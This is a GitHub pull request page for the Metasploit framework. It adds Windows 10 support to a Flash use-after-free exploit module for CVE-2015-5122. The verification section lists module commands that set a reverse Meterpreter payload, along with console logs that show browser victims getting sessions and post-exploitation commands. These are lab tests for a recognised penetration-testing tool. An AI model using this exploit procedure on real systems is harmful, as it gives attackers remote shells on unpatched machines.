Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add support for Windows 10(10240) x86 to CVE-2015-5122 #11924

Merged
merged 2 commits into from Jun 4, 2019

Conversation

Projects
None yet
3 participants
@suzu991154
Copy link
Contributor

commented Jun 1, 2019

This PR supports Windows 10(10240) x86 with the following changes:

  • Change the search source of some ROP gadgets.
  • Restrict the search for ROP gadgets to code sections.

This PR requires rapid7/rex-exploitation#20.

Verification

  • Setup Windows 10 Build 10240(, Firefox 39, Flash 18.0.0.203 for Firefox)
  • use exploit/multi/browser/adobe_flash_opaque_background_uaf
  • set PAYLOAD windows/meterpreter/reverse_http
  • set LHOST <host>
  • set LPORT <port>
  • set SRVPORT 80
  • set URIPATH /
  • run
  • Start IE/FF and access
  • It should get a session

Windows 10(10240) x64 + IE11(WOW64) - Win10 has a built-in Flash 18.0.0.203

msf5 > use exploit/multi/browser/adobe_flash_opaque_background_uaf
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > set SRVPORT 80
SRVPORT => 80
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > set URIPATH /
URIPATH => /
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > set LHOST 192.168.56.86
LHOST => 192.168.56.86
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started HTTP reverse handler on http://192.168.56.86:8080
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.56.86:80/
[*] Server started.
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) >
 :
(start IE and access)
 :
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Gathering target information for 192.168.56.208
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Sending HTML response to 192.168.56.208
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Request: /wPsNxL/
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Sending HTML...
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Request: /wPsNxL/oCvF.swf
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Sending SWF...
[*] http://192.168.56.86:8080 handling request from 192.168.56.208; (UUID: 7qu8gqs6) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (192.168.56.86:8080 -> 192.168.56.208:58052) at 2019-05-31 17:04:12 +0900

msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-IK2RT2G
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getpid
Current pid: 2160
meterpreter > ps

Process List
============

 PID   PPID  Name                              Arch  Session  User                  Path
 ---   ----  ----                              ----  -------  ----                  ----
 0     0     [System Process]
 2160  336   iexplore.exe                      x86   1        DESKTOP-IK2RT2G\user  C:\Program Files (x86)\Internet Explorer\iexplore.exe

Windows 10(10240) x64 + Firefox 39.0, Flash 18.0.0.203

(start FF and access)
 :
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Gathering target information for 192.168.56.208
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Sending HTML response to 192.168.56.208
[-] 192.168.56.208     adobe_flash_opaque_background_uaf - Target 192.168.56.208 has requested an unknown path: /favicon.ico
[-] 192.168.56.208     adobe_flash_opaque_background_uaf - Target 192.168.56.208 has requested an unknown path: /favicon.ico
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Request: /wPsNxL/
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Sending HTML...
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Request: /wPsNxL/NvBW.swf
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Sending SWF...
[*] http://192.168.56.86:8080 handling request from 192.168.56.208; (UUID: 7qu8gqs6) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 2 opened (192.168.56.86:8080 -> 192.168.56.208:58067) at 2019-05-31 17:04:29 +0900

msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) >
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : DESKTOP-IK2RT2G
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Meterpreter     : x86/windows
meterpreter > getpid
Current pid: 2472
meterpreter > ps

Process List
============

 PID   PPID  Name                              Arch  Session  User                  Path
 ---   ----  ----                              ----  -------  ----                  ----
 0     0     [System Process]
 2160  336   iexplore.exe                      x86   1        DESKTOP-IK2RT2G\user  C:\Program Files (x86)\Internet Explorer\iexplore.exe
 2472  3532  FlashPlayerPlugin_18_0_0_203.exe  x86   1        DESKTOP-IK2RT2G\user  C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_18_0_0_203.exe

meterpreter >
@suzu991154

This comment has been minimized.

Copy link
Contributor Author

commented Jun 3, 2019

I corrected the OS check process.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 4, 2019

The exploit works for me on Windows 10:

msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > [*] Using URL: http://172.16.135.1:80/
[*] Server started.
[*] 172.16.135.135   adobe_flash_opaque_background_uaf - Gathering target information for 172.16.135.135
[*] 172.16.135.135   adobe_flash_opaque_background_uaf - Sending HTML response to 172.16.135.135
[*] 172.16.135.135   adobe_flash_opaque_background_uaf - Request: /aWNMjI/
[*] 172.16.135.135   adobe_flash_opaque_background_uaf - Sending HTML...
[*] 172.16.135.135   adobe_flash_opaque_background_uaf - Request: /aWNMjI/unZZ.swf
[*] 172.16.135.135   adobe_flash_opaque_background_uaf - Sending SWF...
[*] http://172.16.135.1:8080 handling request from 172.16.135.135; (UUID: kzbjxvcb) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (172.16.135.1:8080 -> 172.16.135.135:50501) at 2019-06-04 00:18:22 -0500

The PR is pretty much ready to go, except that we still don't have the new gem yet for rex-exploitation. We will sort that out as soon as possible, and then we'll land this. Thank you @suzu991154

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 4, 2019

Got the rex-exploitation gem thing resolved. Turns out I didn't know how to read versions. I'm going to land this now!

@wchen-r7 wchen-r7 merged commit cdce03f into rapid7:master Jun 4, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wchen-r7 added a commit that referenced this pull request Jun 4, 2019

msjenkins-r7 added a commit that referenced this pull request Jun 4, 2019

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 4, 2019

Release Notes

Windows 10 target support has been added for adobe_flash_opaque_background_uaf.

@suzu991154

This comment has been minimized.

Copy link
Contributor Author

commented Jun 4, 2019

Thanks, @wchen-r7!

@suzu991154 suzu991154 deleted the suzu991154:add_support_for_win10_10240 branch Jun 4, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.